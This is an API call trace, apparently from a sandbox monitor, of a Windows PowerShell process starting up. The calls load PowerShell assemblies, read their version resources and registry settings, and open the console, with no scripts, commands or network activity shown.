	[0545.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.737] SetErrorMode (uMode=0x1) returned 0x1
	[0545.737] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24d960 | out: lpFileInformation=0x24d960*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0545.737] SetErrorMode (uMode=0x1) returned 0x1
	[0545.737] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24dbd0 | out: lpdwHandle=0x24dbd0) returned 0x94c
	[0546.628] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d309f0 | out: lpData=0x2d309f0) returned 1
	[0546.629] VerQueryValueW (in: pBlock=0x2d309f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24db48, puLen=0x24db40 | out: lplpBuffer=0x24db48*=0x2d30a8c, puLen=0x24db40) returned 1
	[0546.629] VerQueryValueW (in: pBlock=0x2d309f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24dab8, puLen=0x24dab0 | out: lplpBuffer=0x24dab8*=0x2d30b68, puLen=0x24dab0) returned 1
	[0546.629] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0546.629] CoTaskMemAlloc (cb=0x2e) returned 0x4d2f20
	[0546.629] lstrcpyW (in: lpString1=0x4d2f20, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0546.629] CoTaskMemFree (pv=0x4d2f20) 
	[0546.630] VerQueryValueW (in: pBlock=0x2d309f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24dab8, puLen=0x24dab0 | out: lplpBuffer=0x24dab8*=0x2d30bbc, puLen=0x24dab0) returned 1
	[0546.630] lstrlenW (lpString="System.Management.Automation") returned 28
	[0546.630] CoTaskMemAlloc (cb=0x3c) returned 0x4d1720
	[0546.630] lstrcpyW (in: lpString1=0x4d1720, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0546.630] CoTaskMemFree (pv=0x4d1720) 
	[0546.630] VerQueryValueW (in: pBlock=0x2d309f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24dab8, puLen=0x24dab0 | out: lplpBuffer=0x24dab8*=0x2d30c18, puLen=0x24dab0) returned 1
	[0546.630] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0546.630] CoTaskMemAlloc (cb=0x20) returned 0x4cded0
	[0546.630] lstrcpyW (in: lpString1=0x4cded0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0546.630] CoTaskMemFree (pv=0x4cded0) 
	[0546.630] VerQueryValueW (in: pBlock=0x2d309f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24dab8, puLen=0x24dab0 | out: lplpBuffer=0x24dab8*=0x2d30c58, puLen=0x24dab0) returned 1
	[0546.630] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0546.630] CoTaskMemAlloc (cb=0x44) returned 0x4d1720
	[0546.630] lstrcpyW (in: lpString1=0x4d1720, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0546.630] CoTaskMemFree (pv=0x4d1720) 
	[0546.630] VerQueryValueW (in: pBlock=0x2d309f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24dab8, puLen=0x24dab0 | out: lplpBuffer=0x24dab8*=0x2d30cc0, puLen=0x24dab0) returned 1
	[0546.630] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0546.630] CoTaskMemAlloc (cb=0x76) returned 0x46f120
	[0546.631] lstrcpyW (in: lpString1=0x46f120, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0546.631] CoTaskMemFree (pv=0x46f120) 
	[0546.631] VerQueryValueW (in: pBlock=0x2d309f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24dab8, puLen=0x24dab0 | out: lplpBuffer=0x24dab8*=0x2d30d5c, puLen=0x24dab0) returned 1
	[0546.631] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0546.631] CoTaskMemAlloc (cb=0x44) returned 0x4d1720
	[0546.631] lstrcpyW (in: lpString1=0x4d1720, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0546.631] CoTaskMemFree (pv=0x4d1720) 
	[0546.631] VerQueryValueW (in: pBlock=0x2d309f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24dab8, puLen=0x24dab0 | out: lplpBuffer=0x24dab8*=0x2d30dc0, puLen=0x24dab0) returned 1
	[0546.631] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0546.631] CoTaskMemAlloc (cb=0x58) returned 0x457460
	[0546.631] lstrcpyW (in: lpString1=0x457460, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0546.632] CoTaskMemFree (pv=0x457460) 
	[0546.632] VerQueryValueW (in: pBlock=0x2d309f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24dab8, puLen=0x24dab0 | out: lplpBuffer=0x24dab8*=0x2d30e3c, puLen=0x24dab0) returned 1
	[0546.632] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0546.632] CoTaskMemAlloc (cb=0x20) returned 0x4cded0
	[0546.632] lstrcpyW (in: lpString1=0x4cded0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0546.632] CoTaskMemFree (pv=0x4cded0) 
	[0546.632] VerQueryValueW (in: pBlock=0x2d309f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24dab8, puLen=0x24dab0 | out: lplpBuffer=0x24dab8*=0x2d30ae4, puLen=0x24dab0) returned 1
	[0546.632] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0546.632] CoTaskMemAlloc (cb=0x66) returned 0x4cd010
	[0546.632] lstrcpyW (in: lpString1=0x4cd010, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0546.632] CoTaskMemFree (pv=0x4cd010) 
	[0546.632] VerQueryValueW (in: pBlock=0x2d309f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24dab8, puLen=0x24dab0 | out: lplpBuffer=0x24dab8*=0x0, puLen=0x24dab0) returned 0
	[0546.632] VerQueryValueW (in: pBlock=0x2d309f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24dab8, puLen=0x24dab0 | out: lplpBuffer=0x24dab8*=0x0, puLen=0x24dab0) returned 0
	[0546.632] VerQueryValueW (in: pBlock=0x2d309f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24dab8, puLen=0x24dab0 | out: lplpBuffer=0x24dab8*=0x0, puLen=0x24dab0) returned 0
	[0546.632] VerQueryValueW (in: pBlock=0x2d309f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24da88, puLen=0x24da80 | out: lplpBuffer=0x24da88*=0x2d30a8c, puLen=0x24da80) returned 1
	[0546.632] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0546.632] VerLanguageNameW (in: wLang=0x0, szLang=0x471920, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0546.633] CoTaskMemFree (pv=0x471920) 
	[0546.633] VerQueryValueW (in: pBlock=0x2d309f0, lpSubBlock="\\", lplpBuffer=0x24dad8, puLen=0x24dad0 | out: lplpBuffer=0x24dad8*=0x2d30a18, puLen=0x24dad0) returned 1
	[0546.641] CoTaskMemAlloc (cb=0x104) returned 0x470e70
	[0546.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x470e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0546.642] CoTaskMemFree (pv=0x470e70) 
	[0546.647] CoTaskMemAlloc (cb=0x104) returned 0x470e70
	[0546.647] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x470e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0546.647] CoTaskMemFree (pv=0x470e70) 
	[0546.652] lstrlenW (lpString="䅁") returned 1
	[0546.663] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d9a8 | out: phkResult=0x24d9a8*=0x2f8) returned 0x0
	[0546.665] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d998 | out: phkResult=0x24d998*=0x2fc) returned 0x0
	[0546.665] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24da28 | out: phkResult=0x24da28*=0x300) returned 0x0
	[0546.670] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d96c, lpData=0x0, lpcbData=0x24d968*=0x0 | out: lpType=0x24d96c*=0x1, lpData=0x0, lpcbData=0x24d968*=0x56) returned 0x0
	[0546.671] CoTaskMemAlloc (cb=0x5a) returned 0x4ccfa0
	[0546.671] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d93c, lpData=0x4ccfa0, lpcbData=0x24d938*=0x56 | out: lpType=0x24d93c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d938*=0x56) returned 0x0
	[0546.671] CoTaskMemFree (pv=0x4ccfa0) 
	[0547.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0548.501] CoTaskMemAlloc (cb=0x104) returned 0x470e70
	[0548.501] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x470e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0548.501] CoTaskMemFree (pv=0x470e70) 
	[0555.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0555.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0559.273] CoTaskMemAlloc (cb=0x104) returned 0x49b650
	[0559.273] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49b650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0559.273] CoTaskMemFree (pv=0x49b650) 
	[0559.275] CoTaskMemAlloc (cb=0x104) returned 0x49b650
	[0559.275] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49b650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0559.275] CoTaskMemFree (pv=0x49b650) 
	[0559.308] CoTaskMemAlloc (cb=0x104) returned 0x49b650
	[0559.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49b650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0559.308] CoTaskMemFree (pv=0x49b650) 
	[0560.903] CoTaskMemAlloc (cb=0x104) returned 0x49b650
	[0560.903] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49b650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0560.903] CoTaskMemFree (pv=0x49b650) 
	[0560.904] CoTaskMemAlloc (cb=0x104) returned 0x49b650
	[0560.904] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49b650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0560.904] CoTaskMemFree (pv=0x49b650) 
	[0564.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0564.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0565.346] CoTaskMemAlloc (cb=0x104) returned 0x49b650
	[0565.346] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49b650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.346] CoTaskMemFree (pv=0x49b650) 
	[0565.349] CoTaskMemAlloc (cb=0x104) returned 0x49b650
	[0565.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49b650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.349] CoTaskMemFree (pv=0x49b650) 
	[0566.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0566.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0579.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0579.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0587.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0587.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0592.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0592.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0595.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0595.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0596.428] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0596.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.429] CoTaskMemFree (pv=0x1b8c08b0) 
	[0596.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0596.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0596.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0598.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x24d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0598.629] SetErrorMode (uMode=0x1) returned 0x1
	[0598.629] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x24d900 | out: lpFileInformation=0x24d900*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0598.630] SetErrorMode (uMode=0x1) returned 0x1
	[0605.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0605.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0605.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0605.312] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0605.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.312] CoTaskMemFree (pv=0x1b8c08b0) 
	[0606.298] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0606.298] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.298] CoTaskMemFree (pv=0x1b8c08b0) 
	[0606.298] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0606.298] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.298] CoTaskMemFree (pv=0x1b8c08b0) 
	[0606.301] CoCreateGuid (in: pguid=0x24dcc8 | out: pguid=0x24dcc8*(Data1=0x3799740f, Data2=0x7183, Data3=0x459e, Data4=([0]=0xa3, [1]=0xf9, [2]=0x9f, [3]=0x70, [4]=0x8b, [5]=0x41, [6]=0x6b, [7]=0x88))) returned 0x0
	[0606.305] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0606.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.305] CoTaskMemFree (pv=0x1b8c08b0) 
	[0606.308] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0606.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.308] CoTaskMemFree (pv=0x1b8c08b0) 
	[0606.311] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0606.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.311] CoTaskMemFree (pv=0x1b8c08b0) 
	[0606.319] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0606.320] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x24d970 | out: lpConsoleScreenBufferInfo=0x24d970) returned 1
